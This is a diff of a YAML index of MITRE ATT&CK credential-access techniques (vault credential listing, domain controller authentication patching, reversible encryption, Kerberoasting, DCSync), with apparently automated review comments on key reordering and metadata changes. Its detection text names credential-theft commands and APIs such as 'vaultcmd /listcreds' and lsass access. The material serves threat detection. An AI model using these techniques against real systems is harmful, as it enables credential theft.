+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
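Review bot: everything in this hunk is key reordering for T1555.004 with identical values (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_platforms`, `x_mitre_is_subtechnique` all move, none change). If the index generator serialized keys in a fixed order, hunks like this would vanish and the genuine changes elsewhere in the patch (URL updates, the platform rename on T1556, dropped fields) would be much easier to review. While here: the `x_mitre_detection` context lines inherit typographic quotes (`“Windows Credentials”`) and a hard line break before `).` from upstream, so anyone grepping this index for `vaultcmd /listcreds:"Windows Credentials"` will miss it; not something this PR introduced, but worth knowing if the index is used for detection content.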
@@ -47281,36 +48011,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
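Review bot: `spec_version: '2.1'` is removed from T1555.004 here (and from every object in the patch) while `x_mitre_attack_spec_version` goes 2.1.0 to 3.2.0. `spec_version` is a required common property on every STIX 2.1 object, so if anything downstream treats this index as STIX rather than as an internal lookup table it now has to tolerate the missing key; a line in the PR description saying the index is not STIX-consumed would settle that. The long removal under T1556.001 (`x_mitre_platforms` through the `TechNet Audit Policy` reference) is a relocation, not a deletion: the same fields reappear below the description in the following hunks with `url` and `external_id` swapped in order.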
@@ -47331,6 +48038,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -47345,52 +48053,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
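Review bot: `x_mitre_permissions_required` (`Administrator`) is dropped from T1556.001 with nothing replacing it, and the same field disappears for T1556.005, T1003.006 and T1056.004 later in the patch. That matches ATT&CK retiring the field, but any tooling that filtered tests by required privilege against this index now silently gets no value, so it deserves a mention in the PR description. Apart from that, the only value changes in this hunk are `x_mitre_version: '2.0'` to `'2.1'` and the new `revoked: false`; the interleaving of T1556.001's tail with T1556.005's removed header is caused by `modified` moving above `name` and the `id`/`created`/`external_references` block moving below the detection text.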
@@ -47412,6 +48110,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -47422,23 +48121,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
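Review bot: `x_mitre_version` for T1556.005 goes `'1.0'` to `'1.1'` although no description or detection text changes in this hunk; the visible differences are metadata (`x_mitre_domains`, `x_mitre_platforms`, `revoked: false`) and the dropped `x_mitre_permissions_required` (`User`, `Administrator`). That is consistent with taking the version bump from upstream, but if the upstream description did change, that hunk is not here, so a quick check that nothing was lost in regeneration would be worthwhile. Note also that the references are now ordered alphabetically by author (Metcalf, Microsoft, Teusink) rather than in citation order (`store_pwd_rev_enc` is cited first in the description); harmless for rendering, just different from the old layout.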
@@ -47509,9 +48235,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -47570,12 +48295,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
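Review bot: T1003.003 keeps `x_mitre_attack_spec_version: 3.1.0` as an unchanged context line while T1111 just above and T1558.003 just below move to 3.2.0, and the only change to it is the removal of `spec_version: '2.1'`. If the index is regenerated from a single ATT&CK release, one object left on 3.1.0 means either that T1003.003 was not modified in that release (plausible, since its `modified` line is not in the diff) or that the generator copies per-object spec versions verbatim; either way the mixed spec versions are worth a sentence in the PR description so the next person does not chase it as a regeneration bug.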
@@ -47607,6 +48331,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -47616,7 +48341,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -47628,111 +48352,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
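Review bot: the single substantive change in the T1558.003 reference block is the `Harmj0y Kerberoast Nov 2016` entry, whose URL moves from `https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/` to `https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/` with `Retrieved September 23, 2024`; every other reference line is reordering (alphabetical by author: Bani, EmpireProject, Medin, Metcalf, Microsoft, Schroeder). `x_mitre_modified_by_ref`, removed from T1558.003 in the previous hunk, is restored here next to `x_mitre_attack_spec_version: 3.2.0`, so that earlier removal is a move and not a loss. The large removal at the bottom is the T1003.006 header block (`x_mitre_platforms` through `Harmj0y DCSync Sept 2015`), which reappears below the description in the next hunk.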
@@ -47743,26 +48405,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
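Review bot: the re-added T1003.006 references contain two entries for the same Metcalf post at `https://adsecurity.org/?p=1729` (`ADSecurity Mimikatz DCSync`, `AdSecurity DCSync Sept 2015`) and two for the same Schroeder post, of which only `Harmj0y Mimikatz and DCSync` receives the new `https://blog.harmj0y.net/redteaming/...` URL while `Harmj0y DCSync Sept 2015` keeps `http://www.harmj0y.net/blog/redteaming/...`. The detection text above cites `Harmj0y DCSync Sept 2015`, so the plain-http, un-updated entry is the one readers will actually follow. Both duplicates come from upstream ATT&CK rather than from this PR, so the fix belongs in an upstream issue, but it is worth knowing before anyone deduplicates references by `source_name`. As in the other sub-techniques, `x_mitre_permissions_required` (`Administrator`) is dropped here without replacement.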
@@ -47775,6 +48499,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -47811,17 +48536,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
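Review bot: this is a change in meaning, not ordering: the T1556 platform list loses `Azure AD`, `Google Workspace` and `Office 365` and gains `Office Suite` and `Identity Provider`, with `x_mitre_version` going `'2.4'` to `'2.5'`. Any per-platform index, filter or test selector keyed on the old platform names will now miss T1556 (and presumably every other technique that carries the same renaming upstream). Please make sure the platform-specific indexes are regenerated from the same data in this PR and that nothing in the generator or CI hardcodes the old names, otherwise the per-platform views and this master index will disagree about which platforms T1556 applies to.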
@@ -47867,81 +48592,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
